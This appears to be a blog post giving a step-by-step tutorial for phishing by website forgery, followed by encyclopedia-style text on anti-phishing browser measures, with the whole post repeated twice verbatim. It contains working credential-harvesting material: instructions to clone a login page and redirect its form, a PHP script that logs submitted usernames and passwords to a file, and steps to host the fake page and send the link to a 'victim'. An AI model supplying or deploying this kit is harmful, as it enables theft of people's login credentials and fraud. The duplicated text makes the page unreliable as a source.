Phi$hing
Refer this article along with the screenshots here :
Phishing
Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing, probably influenced by phreaking, and alludes to baits used to "catch" financial information and passwords.
The phishing technique which I am going to demonstrate is called Website Forgery. It means simply creating a duplicate website.
Website forgery :
=============
Step 1:
Go to the website you want to forge.
Step 2:
Right Click & select View Page Source
Step 3:
Once you view the page source, copy & paste the page source in a notepad file & search for the word action, change the form method from post to get , alter the words after the action= field and point to the script meant to grab user keystrokes. Here it is named siemens.php.
Step 4:
Browse to the top of the file & type in the following code :
<link href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAABaElEQVQ4y92SsUtCcRDHP8obHR4iYmFi4CQOEk4VpGLQEFLREjRJf0BDkygYiVNzQ1SDNEmJhEOEmUGEg4HIQ4jEJMQkpEKEIgwb5D16Wn9A3XT87u5zd7/vwZ83jexkQoVeu9FGStVUCTa3GaNdjy/qUnKD2t2eCpAJFXrXO6Vfu7y/dvEGJxSICiAXrx7NMe4ZAeD+4pH0ep6m1FKBZIgMsLlNCE/lZwAOl09xLFhZ3PdQzTZoSi023wIAvNy22XbuUT55UAEtk6MIlVxdeZBSNazTd8yEncjgy60iZ7EsHerUpX6eyWFQphMG901vXGF2GVg5nuU8fEMyFldiAiIAOkO/zBd1abQ2t3no00qJKoCqWO4MIFp1ii8Y7XqVdGuZecamjHQ/PokUI5QSVZKxOCIO7H4LlGDpwKtIqsg42O27iTiGZLS5TQSyfo0g7yIfUi3XpFLL90cWnT8eksGqo9Pq8k/sC60TjgSiUNwZAAAAAElFTkSuQmCC" rel="icon" type="image/x-icon" />
This will cause the favicon to appear. A favicon is the icon you see on a browser on the left hand side of the address bar. The favicon is always website specific.
Step 5:
Save the file as index.html
Step 6:
Now we will need to code a keystroke grabbing script.
Enter the following code in a notepad file:
<?php
header("Location: http://mail.websitenamehere.com");
$handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 7:
Save the file as siemens.php
Step 8:
Create an empty notepad file named logs.txt.
Step 9:
Upload the three created files to a web hosting account of your choice.
Step 10:
Change the permissions on all the files to Read, Write & Execute or if you are familiar with Linux , chmod them to 777.
Step 11:
Finally check all the files in your web hosting account.
Step 12:
Logout & browse to the URL of your web hosting account. It should be displaying your spoofed website.
Step 13:
Send your spoofed URL to your victim either as a hyper reference or as an obsfuscated URL.
Step 14:
When your victim enters the username & password, login to your web hosting account and view the logs.txt notepad file there.
It will contain the username & the password of the victim.
Here the username is demousername & the password is demopassword .
Technical responses
++++++++++++++++
Anti-phishing measures have been implemented as features embedded in browsers, as extensions or toolbars for browsers, and as part of website login procedures. The following are some of the main approaches to the problem.
Helping to identify legitimate websites
Most websites targeted for phishing are secure websites meaning that SSL with strong PKI cryptography is used for server authentication, where the website's URL is used as identifier. In theory it should be possible for the SSL authentication to be used to confirm the site to the user, and this was SSL v2's design requirement and the meta of secure browsing. But in practice, this is easy to trick.
The superficial flaw is that the browser's security user interface (UI) is insufficient to deal with today's strong threats. There are three parts to secure authentication using TLS and certificates: indicating that the connection is in authenticated mode, indicating which site the user is connected to, and indicating which authority says it is this site. All three are necessary for authentication, and need to be confirmed by/to the user.
Secure connection
The standard display for secure browsing from the mid-1990s to mid-2000s was the padlock. In 2005, Mozilla fielded a yellow URL bar 2005 as a better indication of the secure connection. This innovation was later reversed due to the EV certificates, which replaced certain certificates providing a high level of organization identity verification with a green display, and other certificates with an extended blue favicon box to the left of the URL bar (in addition to the switch from "http" to "https" in the url itself).
Which site
The user is expected to confirm that the domain name in the browser's URL bar was in fact where they intended to go. URLs can be too complex to be easily parsed. Users often do not know or recognise the URL of the legitimate sites they intend to connect to, so that the authentication becomes meaningless.A condition for meaningful server authentication is to have a server identifier that is meaningful to the user; many ecommerce sites will change the domain names within their overall set of websites, adding to the opportunity for confusion. Simply displaying the domain name for the visited website as some anti-phishing toolbars do is not sufficient.
Some newer browsers, such as Internet Explorer 9, display the entire URL in grey, with just the domain name itself in black, as a means of assisting users in identifying fraudulent URLs.
An alternate approach is the petname extension for Firefox which lets users type in their own labels for websites, so they can later recognize when they have returned to the site. If the site is not recognised, then the software may either warn the user or block the site outright. This represents user-centric identity management of server identities.Some suggest that a graphical image selected by the user is better than a petname.
With the advent of EV certificates, browsers now typically display the organisation's name in green, which is much more visible and is hopefully more consistent with the user's expectations. Unfortunately, browser vendors have chosen to limit this prominent display only to EV certificates, leaving the user to fend for himself with all other certificates.
Who is the Authority
The browser needs to state who the authority is that makes the claim of who the user is connected to. At the simplest level, no authority is stated, and therefore the browser is the authority, as far as the user is concerned. The browser vendors take on this responsibility by controlling a root list of acceptable CAs. This is the current standard practice.
The problem with this is that not all certification authorities (CAs) employ equally good nor applicable checking, regardless of attempts by browser vendors to control the quality. Nor do all CAs subscribe to the same model and concept that certificates are only about authenticating ecommerce organisations. Certificate Manufacturing is the name given to low-value certificates that are delivered on a credit card and an email confirmation; both of these are easily perverted by fraudsters.Hence, a high-value site may be easily spoofed by a valid certificate provided by another CA. This could be because the CA is in another part of the world, and is unfamiliar with high-value ecommerce sites, or it could be that no care is taken at all. As the CA is only charged with protecting its own customers, and not the customers of other CAs, this flaw is inherent in the model.
The solution to this is that the browser should show, and the user should be familiar with, the name of the authority. This presents the CA as a brand, and allows the user to learn the handful of CAs that she is likely to come into contact within her country and her sector. The use of brand is also critical to providing the CA with an incentive to improve their checking, as the user will learn the brand and demand good checking for high-value sites.
This solution was first put into practice in early IE7 versions, when displaying EV certificates.In that display, the issuing CA is displayed. This was an isolated case, however. There is resistance to CAs being branded on the chrome, resulting in a fallback to the simplest level above: the browser is the user's authority.
Phishing
Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing, probably influenced by phreaking, and alludes to baits used to "catch" financial information and passwords.
The phishing technique which I am going to demonstrate is called Website Forgery. It means simply creating a duplicate website.
Website forgery :
=============
Step 1:
Go to the website you want to forge.
Step 2:
Right Click & select View Page Source
Step 3:
Once you view the page source, copy & paste the page source in a notepad file & search for the word action, change the form method from post to get , alter the words after the action= field and point to the script meant to grab user keystrokes. Here it is named siemens.php.
Step 4:
Browse to the top of the file & type in the following code :
<link href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAABaElEQVQ4y92SsUtCcRDHP8obHR4iYmFi4CQOEk4VpGLQEFLREjRJf0BDkygYiVNzQ1SDNEmJhEOEmUGEg4HIQ4jEJMQkpEKEIgwb5D16Wn9A3XT87u5zd7/vwZ83jexkQoVeu9FGStVUCTa3GaNdjy/qUnKD2t2eCpAJFXrXO6Vfu7y/dvEGJxSICiAXrx7NMe4ZAeD+4pH0ep6m1FKBZIgMsLlNCE/lZwAOl09xLFhZ3PdQzTZoSi023wIAvNy22XbuUT55UAEtk6MIlVxdeZBSNazTd8yEncjgy60iZ7EsHerUpX6eyWFQphMG901vXGF2GVg5nuU8fEMyFldiAiIAOkO/zBd1abQ2t3no00qJKoCqWO4MIFp1ii8Y7XqVdGuZecamjHQ/PokUI5QSVZKxOCIO7H4LlGDpwKtIqsg42O27iTiGZLS5TQSyfo0g7yIfUi3XpFLL90cWnT8eksGqo9Pq8k/sC60TjgSiUNwZAAAAAElFTkSuQmCC" rel="icon" type="image/x-icon" />
This will cause the favicon to appear. A favicon is the icon you see on a browser on the left hand side of the address bar. The favicon is always website specific.
Step 5:
Save the file as index.html
Step 6:
Now we will need to code a keystroke grabbing script.
Enter the following code in a notepad file:
<?php
header("Location: http://mail.websitenamehere.com");
$handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 7:
Save the file as siemens.php
Step 8:
Create an empty notepad file named logs.txt.
Step 9:
Upload the three created files to a web hosting account of your choice.
Step 10:
Change the permissions on all the files to Read, Write & Execute or if you are familiar with Linux , chmod them to 777.
Step 11:
Finally check all the files in your web hosting account.
Step 12:
Logout & browse to the URL of your web hosting account. It should be displaying your spoofed website.
Step 13:
Send your spoofed URL to your victim either as a hyper reference or as an obsfuscated URL.
Step 14:
When your victim enters the username & password, login to your web hosting account and view the logs.txt notepad file there.
It will contain the username & the password of the victim.
Here the username is demousername & the password is demopassword .
Technical responses
++++++++++++++++
Anti-phishing measures have been implemented as features embedded in browsers, as extensions or toolbars for browsers, and as part of website login procedures. The following are some of the main approaches to the problem.
Helping to identify legitimate websites
Most websites targeted for phishing are secure websites meaning that SSL with strong PKI cryptography is used for server authentication, where the website's URL is used as identifier. In theory it should be possible for the SSL authentication to be used to confirm the site to the user, and this was SSL v2's design requirement and the meta of secure browsing. But in practice, this is easy to trick.
The superficial flaw is that the browser's security user interface (UI) is insufficient to deal with today's strong threats. There are three parts to secure authentication using TLS and certificates: indicating that the connection is in authenticated mode, indicating which site the user is connected to, and indicating which authority says it is this site. All three are necessary for authentication, and need to be confirmed by/to the user.
Secure connection
The standard display for secure browsing from the mid-1990s to mid-2000s was the padlock. In 2005, Mozilla fielded a yellow URL bar 2005 as a better indication of the secure connection. This innovation was later reversed due to the EV certificates, which replaced certain certificates providing a high level of organization identity verification with a green display, and other certificates with an extended blue favicon box to the left of the URL bar (in addition to the switch from "http" to "https" in the url itself).
Which site
The user is expected to confirm that the domain name in the browser's URL bar was in fact where they intended to go. URLs can be too complex to be easily parsed. Users often do not know or recognise the URL of the legitimate sites they intend to connect to, so that the authentication becomes meaningless.A condition for meaningful server authentication is to have a server identifier that is meaningful to the user; many ecommerce sites will change the domain names within their overall set of websites, adding to the opportunity for confusion. Simply displaying the domain name for the visited website as some anti-phishing toolbars do is not sufficient.
Some newer browsers, such as Internet Explorer 9, display the entire URL in grey, with just the domain name itself in black, as a means of assisting users in identifying fraudulent URLs.
An alternate approach is the petname extension for Firefox which lets users type in their own labels for websites, so they can later recognize when they have returned to the site. If the site is not recognised, then the software may either warn the user or block the site outright. This represents user-centric identity management of server identities.Some suggest that a graphical image selected by the user is better than a petname.
With the advent of EV certificates, browsers now typically display the organisation's name in green, which is much more visible and is hopefully more consistent with the user's expectations. Unfortunately, browser vendors have chosen to limit this prominent display only to EV certificates, leaving the user to fend for himself with all other certificates.
Who is the Authority
The browser needs to state who the authority is that makes the claim of who the user is connected to. At the simplest level, no authority is stated, and therefore the browser is the authority, as far as the user is concerned. The browser vendors take on this responsibility by controlling a root list of acceptable CAs. This is the current standard practice.
The problem with this is that not all certification authorities (CAs) employ equally good nor applicable checking, regardless of attempts by browser vendors to control the quality. Nor do all CAs subscribe to the same model and concept that certificates are only about authenticating ecommerce organisations. Certificate Manufacturing is the name given to low-value certificates that are delivered on a credit card and an email confirmation; both of these are easily perverted by fraudsters.Hence, a high-value site may be easily spoofed by a valid certificate provided by another CA. This could be because the CA is in another part of the world, and is unfamiliar with high-value ecommerce sites, or it could be that no care is taken at all. As the CA is only charged with protecting its own customers, and not the customers of other CAs, this flaw is inherent in the model.
The solution to this is that the browser should show, and the user should be familiar with, the name of the authority. This presents the CA as a brand, and allows the user to learn the handful of CAs that she is likely to come into contact within her country and her sector. The use of brand is also critical to providing the CA with an incentive to improve their checking, as the user will learn the brand and demand good checking for high-value sites.
This solution was first put into practice in early IE7 versions, when displaying EV certificates.In that display, the issuing CA is displayed. This was an isolated case, however. There is resistance to CAs being branded on the chrome, resulting in a fallback to the simplest level above: the browser is the user's authority.
No comments:
Post a Comment